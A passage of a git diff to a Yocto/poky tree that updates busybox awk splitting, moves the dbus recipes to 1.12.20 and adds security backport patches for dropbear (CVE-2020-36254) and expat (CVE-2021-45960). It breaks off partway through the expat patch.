+ + /* in worst case, each char would be a separate field */ + *slist = s1 = xzalloc(strlen(s) * 2 + 3); +@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist) + return n; /* "": zero fields */ + n++; /* at least one field will be there */ + do { ++ int l; ++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough... ++ + l = strcspn(s, c+2); /* len till next NUL or \n */ +- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0 ++ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0 + && pmatch[0].rm_so <= l + ) { ++ /* if (pmatch[0].rm_eo == 0) ... - impossible */ + l = pmatch[0].rm_so; +- if (pmatch[0].rm_eo == 0) { +- l++; +- pmatch[0].rm_eo++; +- } + n++; /* we saw yet another delimiter */ + } else { + pmatch[0].rm_eo = l; + if (s[l]) + pmatch[0].rm_eo++; + } +- memcpy(s1, s, l); +- /* make sure we remove *all* of the separator chars */ +- do { +- s1[l] = '\0'; +- } while (++l < pmatch[0].rm_eo); +- nextword(&s1); ++ s1 = mempcpy(s1, s, l); ++ *s1++ = '\0'; + s += pmatch[0].rm_eo; + } while (*s); ++ ++ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }' ++ * should print "2 0 ": ++ */ ++ *s1 = '\0'; ++ + return n; + } + if (c[0] == '\0') { /* null split */ +@@ -1995,7 +2035,7 @@ static int ptest(node *pattern) + static int awk_getline(rstream *rsm, var *v) + { + char *b; +- regmatch_t pmatch[2]; ++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough... + int size, a, p, pp = 0; + int fd, so, eo, r, rp; + char c, *m, *s; diff --git a/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb index 677768d35a..b39f7523c0 100644 --- a/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb +++ b/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb @@ -11,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517" PV = "0.1+git${SRCPV}" PR = "r2" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" UPSTREAM_CHECK_COMMITS = "1" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb deleted file mode 100644 index bea0e74ed0..0000000000 --- a/poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb +++ /dev/null @@ -1,90 +0,0 @@ -SUMMARY = "D-Bus test package (for D-bus functionality testing only)" -HOMEPAGE = "http://dbus.freedesktop.org" -SECTION = "base" -LICENSE = "AFL-2.1 | GPLv2+" -LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ - file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" - -DEPENDS = "dbus glib-2.0" - -RDEPENDS_${PN}-dev = "" - -SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ - file://tmpdir.patch \ - file://run-ptest \ - file://python-config.patch \ - file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ - " - -SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890" -SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80" - -S="${WORKDIR}/dbus-${PV}" -FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:" - -inherit autotools pkgconfig gettext ptest upstream-version-is-even - -EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}" -EXTRA_OECONF_X_class-native = "--without-x" - -EXTRA_OECONF = "--enable-tests \ - --enable-modular-tests \ - --enable-installed-tests \ - --enable-checks \ - --enable-asserts \ - --enable-largefile \ - --disable-xml-docs \ - --disable-doxygen-docs \ - --disable-libaudit \ - --with-dbus-test-dir=${PTEST_PATH} \ - ${EXTRA_OECONF_X} \ - --enable-embedded-tests \ - " - -EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" - -PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}" -PACKAGECONFIG_class-native = "" -PACKAGECONFIG_class-nativesdk = "" - -PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" -PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" -PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" -PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,," - -do_install() { - : -} - -do_install_ptest() { - install -d ${D}${PTEST_PATH}/test - l="shell printf refs syslog marshal syntax corrupt dbus-daemon dbus-daemon-eavesdrop loopback relay \ - variant uid-permissions syntax spawn sd-activation names monitor message fdpass service shell-service" - for i in $l; do install ${B}/test/.libs/test-$i ${D}${PTEST_PATH}/test; done - - l="bus bus-system bus-launch-helper" - for i in $l; do install ${B}/bus/.libs/test-$i ${D}${PTEST_PATH}/test; done - - install -d ${D}${PTEST_PATH}/bus - install ${B}/bus/.libs/dbus-daemon-launch-helper-test ${D}${PTEST_PATH}/bus - - install ${B}/test/test-segfault ${D}${PTEST_PATH}/test - - cp -r ${B}/test/data ${D}${PTEST_PATH}/test - install ${B}/dbus/.libs/test-dbus ${D}${PTEST_PATH}/test - - install -d ${D}${PTEST_PATH}/test/.libs - cp -a ${B}/dbus/.libs/*.so* ${D}${PTEST_PATH}/test/.libs - - # Remove build host references... - find "${D}${PTEST_PATH}/test/data" \( -name *.service -o -name *.conf -o -name "*.aaprofile" \) -type f -exec \ - sed -i \ - -e 's:${B}:${PTEST_PATH}:g' \ - {} + - sed -i -e 's;@PTEST_PATH@;${PTEST_PATH};g' ${D}${PTEST_PATH}/run-ptest -} - -RDEPENDS_${PN}-ptest += "bash make dbus" -RDEPENDS_${PN}-ptest_remove = "${PN}" - -PRIVATE_LIBS_${PN}-ptest = "libdbus-1.so.3" diff --git a/poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb b/poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb new file mode 100644 index 0000000000..755c841bad --- /dev/null +++ b/poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb @@ -0,0 +1,64 @@ +SUMMARY = "D-Bus test package (for D-bus functionality testing only)" +HOMEPAGE = "http://dbus.freedesktop.org" +SECTION = "base" + +require dbus.inc + +SRC_URI += "file://run-ptest \ + file://python-config.patch \ + " + +DEPENDS = "dbus glib-2.0" + +RDEPENDS_${PN}-dev = "" + +S="${WORKDIR}/dbus-${PV}" +FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:" + +inherit ptest + +EXTRA_OECONF += "--enable-tests \ + --enable-modular-tests \ + --enable-installed-tests \ + --enable-checks \ + --enable-asserts \ + --with-dbus-test-dir=${PTEST_PATH} \ + --enable-embedded-tests \ + " + +do_install() { + : +} + +do_install_ptest() { + install -d ${D}${PTEST_PATH}/test + l="shell printf refs syslog marshal syntax corrupt dbus-daemon dbus-daemon-eavesdrop loopback relay \ + variant uid-permissions syntax spawn sd-activation names monitor message fdpass service shell-service" + for i in $l; do install ${B}/test/.libs/test-$i ${D}${PTEST_PATH}/test; done + + l="bus bus-system bus-launch-helper" + for i in $l; do install ${B}/bus/.libs/test-$i ${D}${PTEST_PATH}/test; done + + install -d ${D}${PTEST_PATH}/bus + install ${B}/bus/.libs/dbus-daemon-launch-helper-test ${D}${PTEST_PATH}/bus + + install ${B}/test/test-segfault ${D}${PTEST_PATH}/test + + cp -r ${B}/test/data ${D}${PTEST_PATH}/test + install ${B}/dbus/.libs/test-dbus ${D}${PTEST_PATH}/test + + install -d ${D}${PTEST_PATH}/test/.libs + cp -a ${B}/dbus/.libs/*.so* ${D}${PTEST_PATH}/test/.libs + + # Remove build host references... + find "${D}${PTEST_PATH}/test/data" \( -name *.service -o -name *.conf -o -name "*.aaprofile" \) -type f -exec \ + sed -i \ + -e 's:${B}:${PTEST_PATH}:g' \ + {} + + sed -i -e 's;@PTEST_PATH@;${PTEST_PATH};g' ${D}${PTEST_PATH}/run-ptest +} + +RDEPENDS_${PN}-ptest += "bash make dbus" +RDEPENDS_${PN}-ptest_remove = "${PN}" + +PRIVATE_LIBS_${PN}-ptest = "libdbus-1.so.3" diff --git a/poky/meta/recipes-core/dbus/dbus.inc b/poky/meta/recipes-core/dbus/dbus.inc new file mode 100644 index 0000000000..dcbcc0a9d6 --- /dev/null +++ b/poky/meta/recipes-core/dbus/dbus.inc @@ -0,0 +1,34 @@ +inherit autotools pkgconfig gettext upstream-version-is-even + +LICENSE = "AFL-2.1 | GPLv2+" +LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ + file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" + +SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ + file://tmpdir.patch \ + file://dbus-1.init \ + file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ +" + +SRC_URI[md5sum] = "dfe8a71f412e0b53be26ed4fbfdc91c4" +SRC_URI[sha256sum] = "f77620140ecb4cdc67f37fb444f8a6bea70b5b6461f12f1cbe2cec60fa7de5fe" + +EXTRA_OECONF = "--disable-xml-docs \ + --disable-doxygen-docs \ + --disable-libaudit \ + --enable-largefile \ + --with-system-socket=/run/dbus/system_bus_socket \ + " +EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" +EXTRA_OECONF_append_class-native = " --disable-selinux" + +PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \ + user-session \ + " +PACKAGECONFIG_class-native = "" +PACKAGECONFIG_class-nativesdk = "" + +PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" +PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" +PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" +PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,," diff --git a/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch deleted file mode 100644 index ac7a4b7a71..0000000000 --- a/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch +++ /dev/null @@ -1,78 +0,0 @@ -From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001 -From: Simon McVittie -Date: Thu, 16 Apr 2020 14:45:11 +0100 -Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive - -MSG_CTRUNC indicates that we have received fewer fds that we should -have done because the buffer was too small, but we were treating it -as though it indicated that we received *no* fds. If we received any, -we still have to make sure we close them, otherwise they will be leaked. - -On the system bus, if an attacker can induce us to leak fds in this -way, that's a local denial of service via resource exhaustion. - -Reported-by: Kevin Backhouse, GitHub Security Lab -Fixes: dbus#294 -Fixes: CVE-2020-12049 -Fixes: GHSL-2020-057 - -Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63] -CVE: CVE-2020-12049 -Signed-off-by: Lee Chee Yang ---- - dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------ - 1 file changed, 20 insertions(+), 12 deletions(-) - -diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c -index b5fc2466..b176dae1 100644 ---- a/dbus/dbus-sysdeps-unix.c -+++ b/dbus/dbus-sysdeps-unix.c -@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd, - struct cmsghdr *cm; - dbus_bool_t found = FALSE; - -- if (m.msg_flags & MSG_CTRUNC) -- { -- /* Hmm, apparently the control data was truncated. The bad -- thing is that we might have completely lost a couple of fds -- without chance to recover them. Hence let's treat this as a -- serious error. */ -- -- errno = ENOSPC; -- _dbus_string_set_length (buffer, start); -- return -1; -- } -- - for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm)) - if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS) - { -@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd, - if (!found) - *n_fds = 0; - -+ if (m.msg_flags & MSG_CTRUNC) -+ { -+ unsigned int i; -+ -+ /* Hmm, apparently the control data was truncated. The bad -+ thing is that we might have completely lost a couple of fds -+ without chance to recover them. Hence let's treat this as a -+ serious error. */ -+ -+ /* We still need to close whatever fds we *did* receive, -+ * otherwise they'll never get closed. (CVE-2020-12049) */ -+ for (i = 0; i < *n_fds; i++) -+ close (fds[i]); -+ -+ *n_fds = 0; -+ errno = ENOSPC; -+ _dbus_string_set_length (buffer, start); -+ return -1; -+ } -+ - /* put length back (doesn't actually realloc) */ - _dbus_string_set_length (buffer, start + bytes_read); - --- -2.25.1 - diff --git a/poky/meta/recipes-core/dbus/dbus_1.12.16.bb b/poky/meta/recipes-core/dbus/dbus_1.12.16.bb deleted file mode 100644 index 10d1b34448..0000000000 --- a/poky/meta/recipes-core/dbus/dbus_1.12.16.bb +++ /dev/null @@ -1,177 +0,0 @@ -SUMMARY = "D-Bus message bus" -DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed." -HOMEPAGE = "https://dbus.freedesktop.org" -SECTION = "base" -LICENSE = "AFL-2.1 | GPLv2+" -LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ - file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" -DEPENDS = "expat virtual/libintl autoconf-archive" -RDEPENDS_dbus_class-native = "" -RDEPENDS_dbus_class-nativesdk = "" -PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '', d)}" -ALLOW_EMPTY_dbus-ptest = "1" -RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest" - -SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ - file://tmpdir.patch \ - file://dbus-1.init \ - file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ - file://CVE-2020-12049.patch \ -" - -SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890" -SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80" - -inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even - -INITSCRIPT_NAME = "dbus-1" -INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ." - -python __anonymous() { - if not bb.utils.contains('DISTRO_FEATURES', 'sysvinit', True, False, d): - d.setVar("INHIBIT_UPDATERCD_BBCLASS", "1") -} - -USERADD_PACKAGES = "${PN}" -USERADD_PARAM_${PN} = "--system --home ${localstatedir}/lib/dbus \ - --no-create-home --shell /bin/false \ - --user-group messagebus" - -CONFFILES_${PN} = "${sysconfdir}/dbus-1/system.conf ${sysconfdir}/dbus-1/session.conf" - -DEBIANNAME_${PN} = "dbus-1" - -PACKAGES =+ "${PN}-lib" - -OLDPKGNAME = "dbus-x11" -OLDPKGNAME_class-nativesdk = "" - -# for compatibility -RPROVIDES_${PN} = "${OLDPKGNAME}" -RREPLACES_${PN} += "${OLDPKGNAME}" - -FILES_${PN} = "${bindir}/dbus-daemon* \ - ${bindir}/dbus-uuidgen \ - ${bindir}/dbus-cleanup-sockets \ - ${bindir}/dbus-send \ - ${bindir}/dbus-monitor \ - ${bindir}/dbus-launch \ - ${bindir}/dbus-run-session \ - ${bindir}/dbus-update-activation-environment \ - ${libexecdir}/dbus* \ - ${sysconfdir} \ - ${localstatedir} \ - ${datadir}/dbus-1/services \ - ${datadir}/dbus-1/system-services \ - ${datadir}/dbus-1/session.d \ - ${datadir}/dbus-1/session.conf \ - ${datadir}/dbus-1/system.d \ - ${datadir}/dbus-1/system.conf \ - ${datadir}/xml/dbus-1 \ - ${systemd_system_unitdir} \ - ${systemd_user_unitdir} \ - ${nonarch_libdir}/sysusers.d/dbus.conf \ - ${nonarch_libdir}/tmpfiles.d/dbus.conf \ -" -FILES_${PN}-lib = "${libdir}/lib*.so.*" -RRECOMMENDS_${PN}-lib = "${PN}" -FILES_${PN}-dev += "${libdir}/dbus-1.0/include ${libdir}/cmake/DBus1 ${bindir}/dbus-test-tool" - -PACKAGE_WRITE_DEPS += "${@bb.utils.contains('DISTRO_FEATURES','systemd sysvinit','systemd-systemctl-native','',d)}" -pkg_postinst_dbus() { - # If both systemd and sysvinit are enabled, mask the dbus-1 init script - if ${@bb.utils.contains('DISTRO_FEATURES','systemd sysvinit','true','false',d)}; then - if [ -n "$D" ]; then - OPTS="--root=$D" - fi - systemctl $OPTS mask dbus-1.service - fi - - if [ -z "$D" ] && [ -e /etc/init.d/populate-volatile.sh ] ; then - /etc/init.d/populate-volatile.sh update - fi -} - - -EXTRA_OECONF = "--disable-tests \ - --disable-xml-docs \ - --disable-doxygen-docs \ - --disable-libaudit \ - --enable-largefile \ - --with-system-socket=/run/dbus/system_bus_socket \ - " - -EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" -EXTRA_OECONF_append_class-native = " --disable-selinux" - -PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \ - user-session \ - " - -PACKAGECONFIG_class-native = "" -PACKAGECONFIG_class-nativesdk = "" - -PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" -PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" -PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" - -do_install() { - autotools_do_install - - if ${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'true', 'false', d)}; then - install -d ${D}${sysconfdir}/init.d - sed 's:@bindir@:${bindir}:' < ${WORKDIR}/dbus-1.init >${WORKDIR}/dbus-1.init.sh - install -m 0755 ${WORKDIR}/dbus-1.init.sh ${D}${sysconfdir}/init.d/dbus-1 - install -d ${D}${sysconfdir}/default/volatiles - echo "d messagebus messagebus 0755 ${localstatedir}/run/dbus none" \ - > ${D}${sysconfdir}/default/volatiles/99_dbus - fi - - if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then - for i in dbus.target.wants sockets.target.wants multi-user.target.wants; do \ - install -d ${D}${systemd_system_unitdir}/$i; done - install -m 0644 ${B}/bus/dbus.service ${B}/bus/dbus.socket ${D}${systemd_system_unitdir}/ - ln -fs ../dbus.socket ${D}${systemd_system_unitdir}/dbus.target.wants/dbus.socket - ln -fs ../dbus.socket ${D}${systemd_system_unitdir}/sockets.target.wants/dbus.socket - ln -fs ../dbus.service ${D}${systemd_system_unitdir}/multi-user.target.wants/dbus.service - fi - - - mkdir -p ${D}${localstatedir}/lib/dbus - - chown messagebus:messagebus ${D}${localstatedir}/lib/dbus - - chown root:messagebus ${D}${libexecdir}/dbus-daemon-launch-helper - chmod 4755 ${D}${libexecdir}/dbus-daemon-launch-helper - - # Remove Red Hat initscript - rm -rf ${D}${sysconfdir}/rc.d - - # Remove empty testexec directory as we don't build tests - rm -rf ${D}${libdir}/dbus-1.0/test - - # Remove /var/run as it is created on startup - rm -rf ${D}${localstatedir}/run -} - -do_install_class-native() { - autotools_do_install - - # dbus-launch has no X support so lets not install it in case the host - # has a more featured and useful version - rm -f ${D}${bindir}/dbus-launch -} - -do_install_class-nativesdk() { - autotools_do_install - - # dbus-launch has no X support so lets not install it in case the host - # has a more featured and useful version - rm -f ${D}${bindir}/dbus-launch - - # Remove /var/run to avoid QA error - rm -rf ${D}${localstatedir}/run -} -BBCLASSEXTEND = "native nativesdk" - -INSANE_SKIP_${PN}-ptest += "build-deps" diff --git a/poky/meta/recipes-core/dbus/dbus_1.12.20.bb b/poky/meta/recipes-core/dbus/dbus_1.12.20.bb new file mode 100644 index 0000000000..cf6f7dc0ef --- /dev/null +++ b/poky/meta/recipes-core/dbus/dbus_1.12.20.bb @@ -0,0 +1,147 @@ +SUMMARY = "D-Bus message bus" +DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed." +HOMEPAGE = "https://dbus.freedesktop.org" +SECTION = "base" + +require dbus.inc + +DEPENDS = "expat virtual/libintl autoconf-archive" +RDEPENDS_dbus_class-native = "" +RDEPENDS_dbus_class-nativesdk = "" +PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '', d)}" +ALLOW_EMPTY_dbus-ptest = "1" +RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest" + +inherit useradd update-rc.d + +INITSCRIPT_NAME = "dbus-1" +INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ." + +python __anonymous() { + if not bb.utils.contains('DISTRO_FEATURES', 'sysvinit', True, False, d): + d.setVar("INHIBIT_UPDATERCD_BBCLASS", "1") +} + +USERADD_PACKAGES = "${PN}" +USERADD_PARAM_${PN} = "--system --home ${localstatedir}/lib/dbus \ + --no-create-home --shell /bin/false \ + --user-group messagebus" + +CONFFILES_${PN} = "${sysconfdir}/dbus-1/system.conf ${sysconfdir}/dbus-1/session.conf" + +DEBIANNAME_${PN} = "dbus-1" + +PACKAGES =+ "${PN}-lib" + +OLDPKGNAME = "dbus-x11" +OLDPKGNAME_class-nativesdk = "" + +# for compatibility +RPROVIDES_${PN} = "${OLDPKGNAME}" +RREPLACES_${PN} += "${OLDPKGNAME}" + +FILES_${PN} = "${bindir}/dbus-daemon* \ + ${bindir}/dbus-uuidgen \ + ${bindir}/dbus-cleanup-sockets \ + ${bindir}/dbus-send \ + ${bindir}/dbus-monitor \ + ${bindir}/dbus-launch \ + ${bindir}/dbus-run-session \ + ${bindir}/dbus-update-activation-environment \ + ${libexecdir}/dbus* \ + ${sysconfdir} \ + ${localstatedir} \ + ${datadir}/dbus-1/services \ + ${datadir}/dbus-1/system-services \ + ${datadir}/dbus-1/session.d \ + ${datadir}/dbus-1/session.conf \ + ${datadir}/dbus-1/system.d \ + ${datadir}/dbus-1/system.conf \ + ${datadir}/xml/dbus-1 \ + ${systemd_system_unitdir} \ + ${systemd_user_unitdir} \ + ${nonarch_libdir}/sysusers.d/dbus.conf \ + ${nonarch_libdir}/tmpfiles.d/dbus.conf \ +" +FILES_${PN}-lib = "${libdir}/lib*.so.*" +RRECOMMENDS_${PN}-lib = "${PN}" +FILES_${PN}-dev += "${libdir}/dbus-1.0/include ${libdir}/cmake/DBus1 ${bindir}/dbus-test-tool" + +PACKAGE_WRITE_DEPS += "${@bb.utils.contains('DISTRO_FEATURES','systemd sysvinit','systemd-systemctl-native','',d)}" +pkg_postinst_dbus() { + # If both systemd and sysvinit are enabled, mask the dbus-1 init script + if ${@bb.utils.contains('DISTRO_FEATURES','systemd sysvinit','true','false',d)}; then + if [ -n "$D" ]; then + OPTS="--root=$D" + fi + systemctl $OPTS mask dbus-1.service + fi + + if [ -z "$D" ] && [ -e /etc/init.d/populate-volatile.sh ] ; then + /etc/init.d/populate-volatile.sh update + fi +} + + +EXTRA_OECONF += "--disable-tests" + +do_install() { + autotools_do_install + + if ${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'true', 'false', d)}; then + install -d ${D}${sysconfdir}/init.d + sed 's:@bindir@:${bindir}:' < ${WORKDIR}/dbus-1.init >${WORKDIR}/dbus-1.init.sh + install -m 0755 ${WORKDIR}/dbus-1.init.sh ${D}${sysconfdir}/init.d/dbus-1 + install -d ${D}${sysconfdir}/default/volatiles + echo "d messagebus messagebus 0755 ${localstatedir}/run/dbus none" \ + > ${D}${sysconfdir}/default/volatiles/99_dbus + fi + + if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then + for i in dbus.target.wants sockets.target.wants multi-user.target.wants; do \ + install -d ${D}${systemd_system_unitdir}/$i; done + install -m 0644 ${B}/bus/dbus.service ${B}/bus/dbus.socket ${D}${systemd_system_unitdir}/ + ln -fs ../dbus.socket ${D}${systemd_system_unitdir}/dbus.target.wants/dbus.socket + ln -fs ../dbus.socket ${D}${systemd_system_unitdir}/sockets.target.wants/dbus.socket + ln -fs ../dbus.service ${D}${systemd_system_unitdir}/multi-user.target.wants/dbus.service + fi + + + mkdir -p ${D}${localstatedir}/lib/dbus + + chown messagebus:messagebus ${D}${localstatedir}/lib/dbus + + chown root:messagebus ${D}${libexecdir}/dbus-daemon-launch-helper + chmod 4755 ${D}${libexecdir}/dbus-daemon-launch-helper + + # Remove Red Hat initscript + rm -rf ${D}${sysconfdir}/rc.d + + # Remove empty testexec directory as we don't build tests + rm -rf ${D}${libdir}/dbus-1.0/test + + # Remove /var/run as it is created on startup + rm -rf ${D}${localstatedir}/run +} + +do_install_class-native() { + autotools_do_install + + # dbus-launch has no X support so lets not install it in case the host + # has a more featured and useful version + rm -f ${D}${bindir}/dbus-launch +} + +do_install_class-nativesdk() { + autotools_do_install + + # dbus-launch has no X support so lets not install it in case the host + # has a more featured and useful version + rm -f ${D}${bindir}/dbus-launch + + # Remove /var/run to avoid QA error + rm -rf ${D}${localstatedir}/run +} +BBCLASSEXTEND = "native nativesdk" + +INSANE_SKIP_${PN}-ptest += "build-deps" diff --git a/poky/meta/recipes-core/dropbear/dropbear.inc b/poky/meta/recipes-core/dropbear/dropbear.inc index d41e8b36dc..b949a9a337 100644 --- a/poky/meta/recipes-core/dropbear/dropbear.inc +++ b/poky/meta/recipes-core/dropbear/dropbear.inc @@ -22,7 +22,9 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \ file://dropbear.socket \ file://dropbear.default \ ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ - ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} " + ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \ + file://CVE-2020-36254.patch \ + " PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \ file://0006-dropbear-configuration-file.patch \ diff --git a/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch new file mode 100644 index 0000000000..64d0d96486 --- /dev/null +++ b/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch @@ -0,0 +1,29 @@ +From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001 +From: Haelwenn Monnier +Date: Mon, 25 May 2020 14:54:29 +0200 +Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80) + +Reference: +https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff + +CVE: CVE-2020-36254 +Upstream-Status: Backport + +--- + scp.c | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +diff --git a/scp.c b/scp.c +index 742ae00..7b8e7d2 100644 +--- a/scp.c ++++ b/scp.c +@@ -935,7 +935,8 @@ sink(int argc, char **argv) + size = size * 10 + (*cp++ - '0'); + if (*cp++ != ' ') + SCREWUP("size not delimited"); +- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) { ++ if (*cp == '\0' || strchr(cp, '/') != NULL || ++ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) { + run_err("error: unexpected filename: %s", cp); + exit(1); + } diff --git a/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch new file mode 100644 index 0000000000..523449e22c --- /dev/null +++ b/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch @@ -0,0 +1,65 @@ +From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001 +From: Sebastian Pipping +Date: Mon, 27 Dec 2021 20:15:02 +0100 +Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function + storeAtts (CVE-2021-45960) + +Upstream-Status: Backport: +https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea + +CVE: CVE-2021-45960 +Signed-off-by: Steve Sakoman + +--- + expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++-- + 1 file changed, 29 insertions(+), 2 deletions(-) + +diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c +index d730f41c3..b47c31b05 100644 +--- a/lib/xmlparse.c ++++ b/lib/xmlparse.c +@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + if (nPrefixes) { + int j; /* hash table index */ + unsigned long version = 